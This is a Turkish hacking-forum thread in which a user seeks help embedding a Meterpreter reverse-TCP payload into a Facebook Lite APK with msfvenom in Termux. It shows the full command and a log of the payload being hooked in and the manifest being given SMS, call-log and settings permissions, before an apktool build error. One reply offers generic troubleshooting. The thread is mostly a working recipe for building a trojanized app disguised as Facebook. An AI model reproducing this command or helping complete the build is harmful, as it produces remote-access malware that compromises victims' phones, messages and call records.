Termux payload enjekte etme

createxsw

Yeni üye
18 Eyl 2023
7
1
Merhabalar forumda aslında çok yeniyim ve bir kaç gündür hiç bir yerde çözümünü bulamadığım bir konuyu sizle paylaşmak istiyorum termuxta apk payload enjekte etmem için tüm araçlar kurulu apktool vb ama sürekli aynı hatayı alıyorum apktoolun güncelini tam olarak kuramamıştım bu yüzden bir tool yardımıyla kurmuştum bu yüzden olabilir belki bilmiyorum ama şu hatayı alıyorum sürekli

msfvenom -x facebook31.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=2969 > facebook91918.apk
WARNING: Nokogiri was built against libxml version 2.12.5, but has dynamically loaded 2.12.6
Using APK template: facebook31.apk
[-] No platform was selected, choosing Msf::Module::platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.facebook.lite.ulafk
[*] Loading /data/data/com.termux/files/usr/tmp/d20240322-892-ecwejv/original/smali/com/facebook/lite/ClientApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Rebuilding apk with meterpreter injection as /data/data/com.termux/files/usr/tmp/d20240322-892-ecwejv/output.apk
[-] I: Using Apktool 2.9.3
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
brut.androlib.exceptions.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/data/data/com.termux/files/usr/tmp/brut_util_Jar_98560833909340969167782370257427779156.tmp, compile, --dir, /data/data/com.termux/files/usr/tmp/d20240322-892-ecwejv/original/res, --legacy, -o, /data/data/com.termux/files/usr/tmp/d20240322-892-ecwejv/original/build/resources.zip]
W: /data/data/com.termux/files/usr/tmp/brut_util_Jar_98560833909340969167782370257427779156.tmp[235]: syntax error: unexpected '('
[*] Unable to rebuild apk. Trying rebuild with AAPT2..
[-] I: Using Apktool 2.9.3
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
brut.androlib.exceptions.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/data/data/com.termux/files/usr/tmp/brut_util_Jar_183528180908482306568764106353915295821.tmp, compile, --dir, /data/data/com.termux/files/usr/tmp/d20240322-892-ecwejv/original/res, --legacy, -o, /data/data/com.termux/files/usr/tmp/d20240322-892-ecwejv/original/build/resources.zip]
W: /data/data/com.termux/files/usr/tmp/brut_util_Jar_183528180908482306568764106353915295821.tmp[235]: syntax error: unexpected '('
Error: Unable to rebuild apk with apktool

Bu hatanın çözümünü bir türlü bulamadım ve enjekte olmuyor başka apklarda denedim ama yine olmuyor lütfen artık birisi bunun çözümü şu derse çok mutlu olurum hayırlı ramazanlar seviliyorsunuz

Carlonhack

Uzman üye
20 Şub 2022
1,360
347
Görünüşe göre APK dosyasını yeniden inşa etme sırasında bir hata alıyorsunuz. İnşa işlemi sırasında syntax error hatası meydana geliyor gibi görünüyor. Bu tür bir hata, genellikle kaynak kodunda yanlış bir şeylerin olduğunu veya yanlış bir şekilde biçimlendirildiğini gösterebilir. İnşa işleminden önce kaynak kodunu kontrol ederek veya syntax hatalarını düzelterek deneyebilirsiniz. Ayrıca, APKTool veya diğer kullanılan araçların güncel sürümlerini kullanarak tekrar denemeyi düşünebilirsiniz.

createxsw

Yeni üye
18 Eyl 2023
7
1
Görünüşe göre APK dosyasını yeniden inşa etme sırasında bir hata alıyorsunuz. İnşa işlemi sırasında syntax error hatası meydana geliyor gibi görünüyor. Bu tür bir hata, genellikle kaynak kodunda yanlış bir şeylerin olduğunu veya yanlış bir şekilde biçimlendirildiğini gösterebilir. İnşa işleminden önce kaynak kodunu kontrol ederek veya syntax hatalarını düzelterek deneyebilirsiniz. Ayrıca, APKTool veya diğer kullanılan araçların güncel sürümlerini kullanarak tekrar denemeyi düşünebilirsiniz.
Apktool en son sürümü kaynak kodu derken neyin kaynak kodu onu tam anlayamadım bana şunu şunu yap demen daha iyi olurdu mesela eğer biliyorsan tabiki yinede teşekkürler " npm install openai " bunun gibi çoğu şeyi denedim farklı apklara enjekte etmeyi denedim ama olmuyor illaki bunun çözümünü bilen vardır ama bilmiyorum bilen anlayan birisi varsa yardımcı olursa sevinirim tekrardan çözümün için teşekkürler yinede

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.